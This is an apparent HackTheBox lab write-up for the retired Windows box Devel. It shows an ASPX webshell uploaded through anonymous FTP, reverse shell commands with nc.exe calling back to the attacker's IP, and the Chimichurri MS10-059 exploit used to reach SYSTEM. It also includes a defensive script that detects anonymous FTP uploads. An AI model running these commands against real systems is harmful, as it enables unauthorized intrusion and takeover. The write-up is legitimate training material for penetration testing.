
HackTheBox - Retired - Devel - Updated

Hackthebox - Retired - Devel


Recon

I've been using Threader3000 for my recon scans lately. It's a threaded Python port scanner that suggests nmap scans based on the results of its initial up/down scan.



Just 2 open ports


I like to convert the nmap xml to html to make it easy on the eyes.

xsltproc ./10.10.10.5.xml -o ../devel.htb.html





So this looks like a Microsoft box with FTP open on port 21 to anonymous and IIS 7.5 on port 80.


Let's start with port 80 and see what they are serving up.



Just the standard IIS parking page.


FTP (logged in as anonymous)


Looks like the www folder for the webserver.


So anonymous has write permissions on the FTP, so we can put any file we want in there… I uploaded a webshell that comes pre-rolled with Kali.




Exploit



Here you can see cmdasp.aspx in the root of what looks like the webserver.


Let's see if we can browse to this now.



That was quick and easy.


I used the FTP to upload nc.exe to devel to see if we could get a better shell.


I found the files we uploaded just by running dir; eventually I found them in


C:\inetpub\wwwroot\
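The whole foothold on this box rests on anonymous FTP being able to write into the IIS webroot, so the event a defender wants to catch is an anonymous STOR of a script or executable into that folder. Here is an added example (not from the original post) that parses the IIS 7.5 FTP W3C log format, using a constructed log sample and a constructed session id, and flags exactly those uploads (the file names cmdasp.aspx and nc.exe mirror the ones uploaded above):

```python
import os

# Constructed sample of an IIS 7.5 FTP W3C log (not taken from the page).
# The column layout comes from the #Fields header, which the parser reads
# rather than hard-coding, so it also works with other field selections.
SAMPLE_FTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Version: 1.0
#Fields: date time c-ip c-port cs-username cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2021-05-10 20:15:03 10.10.14.6 49152 - USER anonymous 331 0 0 1a2b3c /
2021-05-10 20:15:03 10.10.14.6 49152 anonymous PASS *** 230 0 0 1a2b3c /
2021-05-10 20:15:07 10.10.14.6 49152 anonymous RETR welcome.png 226 0 0 1a2b3c /welcome.png
2021-05-10 20:15:20 10.10.14.6 49152 anonymous STOR cmdasp.aspx 226 0 0 1a2b3c /cmdasp.aspx
2021-05-10 20:15:31 10.10.14.6 49152 anonymous STOR nc.exe 226 0 0 1a2b3c /nc.exe
2021-05-10 20:15:40 10.10.14.6 49152 anonymous STOR notes.txt 550 0 0 1a2b3c /notes.txt
"""

# Extensions that IIS will execute or that are useful to an attacker once
# they sit in the webroot; extend to taste for your environment.
RISKY_EXT = {".aspx", ".asp", ".ashx", ".asmx", ".exe", ".dll", ".bat", ".ps1"}


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue  # other directives (#Software, #Date, ...) carry no records
        parts = line.split()
        if fields and len(parts) == len(fields):
            yield dict(zip(fields, parts))


def anonymous_uploads(text):
    """Return (timestamp, client ip, path) for successful anonymous uploads
    of risky file types. sc-status 2xx (226 on IIS) means the STOR completed;
    a 550 denial is not reported because nothing landed on disk."""
    hits = []
    for rec in parse_w3c(text):
        if rec.get("cs-username", "").lower() != "anonymous":
            continue
        if rec.get("cs-method") != "STOR" or not rec.get("sc-status", "").startswith("2"):
            continue
        path = rec.get("x-fullpath") or rec.get("cs-uri-stem", "")
        if os.path.splitext(path)[1].lower() in RISKY_EXT:
            hits.append((rec["date"] + " " + rec["time"], rec["c-ip"], path))
    return hits
```

Each hit is a file an unauthenticated client dropped into the FTP root; if that root is also the IIS webroot, the fix is to remove anonymous write (or split the FTP and web directories), not just to delete the file.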


So then I set up a listener on my Kali box


nc -lnvp 5555


And in the command window on devel I put in


C:\inetpub\wwwroot\nc.exe 10.10.14.6 5555 -e "cmd.exe"

Then I checked back in on my listener and 



We do have a low-level shell.


I used the FTP to upload winpeas.bat to devel to see if we could get some basic enumeration on the box.


I don't know what the intended path is to "Own" this box but there are sure a lot of patches it's missing.



I don't know about you, but I love Brazilian food, so that Chimichurri one catches my eye. It looks like there are several vulnerabilities we could use going forward; you might try some of the others and see where you get.


https://rapid7.com/db/vulnerabilities/WINDOWS-HOTFIX-MS10-059



It says it's a privilege escalation vulnerability which an authenticated user can use to escalate privileges to SYSTEM. That sounds like exactly what we are looking for.


I pretty quickly googled for an exploit and found this compiled one, where we only need to supply the IP address and port of our listener for a reverse shell.


https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri


I downloaded it and used the FTP to upload it to C:\inetpub\wwwroot.


Set up a new listener on my Kali box


nc -lnvp 4455


And from my aspx shell I ran this command.


C:\inetpub\wwwroot\Chimichurri.exe 10.10.14.6 4455




And just as advertised, we are "system" which means we have full access to everything about this computer.


Just a quick cd over to C:\users\administrator\desktop


And we can get the root flag.



I just realized that we didn't get the user flag; just a quick cd over to that folder.


This is a redo of the first box I ever did on HackTheBox.eu. I can remember being blown away reading write-ups on this box and how I could follow along and actually "hack" a computer. I'm pleased to say I didn't need any write-ups to follow on this box now; my skills are growing such that this box seemed pretty easy to me. If you are new to this too, keep going. It might seem a bit hard and a bit like magic the first time you do it, but you will get better and have a better understanding of what you are doing if you just keep at it.



Hack The Planet!

